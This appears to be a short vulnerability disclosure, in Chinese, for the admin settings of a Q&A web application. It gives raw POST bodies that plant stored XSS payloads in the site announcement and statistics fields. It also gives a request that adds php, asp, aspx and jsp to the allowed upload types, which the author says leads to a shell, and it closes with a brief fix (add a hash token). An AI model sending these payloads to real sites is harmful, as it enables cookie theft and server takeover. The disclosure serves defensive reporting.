http://127.0.0.1:8080/wenda/?/admin/setting/sys_save_ajax/

 

 

site_announce=<script>alert(document.cookie)</script>&url_rewrite_enable=N&request_route=1&request_route_custom=%2Fhome%2Fexplore%2F%3D%3D%3D%2Fexplore%2F%0A%2Fhome%2Fexplore%2Fguest%3D%3D%3D%2Fguest%0A%2Fhome%2Fexplore%2Fcategory-(%3Anum)%3D%3D%3D%2Fcategory%2F(%3Anum)%0A%2Fpeople%2Flist%2F%3D%3D%3D%2Fusers%2F%0A%2Faccount%2Flogin%2F%3D%3D%3D%2Flogin%2F%0A%2Faccount%2Flogout%2F%3D%3D%3D%2Flogout%2F%0A%2Faccount%2Fsetting%2F(%3Aany)%2F%3D%3D%3D%2Fsetting%2F(%3Aany)%2F&online_count_open=Y&online_interval=15&unread_flush_interval=100&auto_question_lock_day=30&statistic_code=%3Cscript%3Ealert(1)%3C%2Fscript%3E&report_reason=%E5%B9%BF%E5%91%8A%2FSPAM%0A%E6%81%B6%E6%84%8F%E7%81%8C%E6%B0%B4%0A%E8%BF%9D%E8%A7%84%E5%86%85%E5%AE%B9%0A%E6%96%87%E4%B8%8D%E5%AF%B9%E9%A2%98%0A%E9%87%8D%E5%A4%8D%E5%8F%91%E9%97%AE&report_message_uid=1&time_style=Y&admin_login_seccode=Y&_post_type=ajax

 

site_announce参数对应的是:站点功能->网站公告：(支持HTML)

 

statistic_code参数对应的是:站点功能->网站统计代码

 

其他参数默认即可。

 

 

http://127.0.0.1:8080/wenda/?/admin/setting/type-content

 

内容设置里面可以设置上传文件名的后缀,更加危险！！！

 

 

quick_publish=Y&upload_enable=Y&allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp&upload_size_limit=512&answer_length_lower=2&question_title_limit=100&comment_limit=0&topic_title_limit=12&upload_avatar_size_limit=512&answer_edit_time=30&uninterested_fold=5&best_answer_day=30&best_answer_min_count=3&best_agree_min_count=3&related_question_keyword_count=&_post_type=ajax

 

 

allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp懂的。。。 

 

 

 

首页会中XSS,中所有用户。

 

 

 

 

用户可以直接拿Shell.

 

修复方案：

加上hash。